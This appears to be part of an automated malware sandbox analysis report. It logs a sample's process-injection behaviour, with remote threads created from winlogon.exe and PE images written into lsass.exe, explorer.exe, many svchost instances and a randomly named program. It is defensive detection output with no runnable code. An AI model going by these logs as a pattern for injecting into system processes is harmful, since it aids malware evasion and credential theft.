        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: EE144048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: D8944048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 99884048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: E87C4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: D5154048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 401A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: D0134048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 5A3D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\spoolsv.exe EIP: DA4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: F43B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 96F84048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 2F24048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 729B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 591B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DF754048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 69A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 7E634048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BDE84048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 12674048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: CB344048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 251A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 4E944048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BD094048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C2134048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D1194048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 593C4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: CBE84048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D40E4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: E8514048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 71944048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 8C84048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 5E374048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BE934048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BA694048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A8904048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C2744048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 3C934048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 13AC4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 10624048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 16094048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 40F84048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 5CAF4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 9B274048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AF3F4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 60B04048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 49A04048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C6E74048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DE554048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: FF3A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D53F4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AB794048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 58347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BD294048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 5E2D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 15E4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C2D44048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AD654048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 40984048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: E3B54048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C1784048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: E67B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D654048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C1347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: E1347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2EB347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2EC347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 61347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: E8347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2CF347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 27E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: E0347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2BE347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 29A347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 8A347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DD347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 27E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 294347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DE347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 301347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 7C347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 288347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 307347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2C9347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C5347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C3347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 27E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2A5347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BD347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 10D347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2C3347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2D7347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C7347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 111347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D2347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2A4347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 287347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 103347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C5347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 12E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 266347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BE347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 29B347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2F9347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 138347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 15E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 15D347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 236347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 21D347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 80347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2BA347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DA347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 80347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: F2347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2CF347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2E4347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 26B347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 132347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 132347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: F7347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2D6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 154347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D9347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: CC347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 21F347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DC347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C2347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AD347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2B3347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DC347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BC347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 24A347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C1347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2E2347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 6E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 226347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2EF347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B8347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AE347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DC347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 28E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2E8347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 4F9D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B7B94048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 204D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 6CF44048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C2284048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C22B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A7FA4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 3CD54048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 811D4048Jump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\winlogon.exe base: 22FCE7B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\lsass.exe base: 19AB9340000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A53E9B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dwm.exe base: 2382E970000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27D8F490000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD09E70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20EBF9D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 229EA670000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1777BD90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1590E680000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21C29A30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 276D7290000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21D84690000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25BFDA60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 16914530000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 227D2790000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 131E07D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 13EB1F30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27714AC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 237FE190000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27C5FFB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9EE140000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B6D8940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26099880000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 267E87C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 223D5150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 272401A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 24AD0130000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2565A3D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\spoolsv.exe base: DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 184F43B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2A196F80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21502F20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C8729B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 233591B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21DDF750000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 10E069A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 23F7E630000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 230BDE80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1ED12670000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 120CB340000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 297251A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C84E940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\sihost.exe base: 22ABD090000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 299C2130000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A4D1190000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 280593C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 28CCBE80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253D40E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ctfmon.exe base: 156E8510000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20B71940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\explorer.exe base: 8C80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C55E370000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 192BE930000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dasHost.exe base: 12EBA690000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 207A8900000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2E7C2740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2393C930000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 1A313AC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D010620000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 22F16090000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 17740F80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1555CAF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EE9B270000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\SystemSettingsBroker.exe base: 198AF3F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 29660B00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25549A00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 216C6E70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253DE550000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 261FF3A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1C5D53F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1A2AB790000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 580000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 20BBD290000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1245E2D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 210015E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BFC2D40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 1ACAD650000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16740980000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 202E3B50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 23CC1780000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253E67B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26E0D650000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 610000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 8A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3010000 value starts with: 4D5AJump to behavior
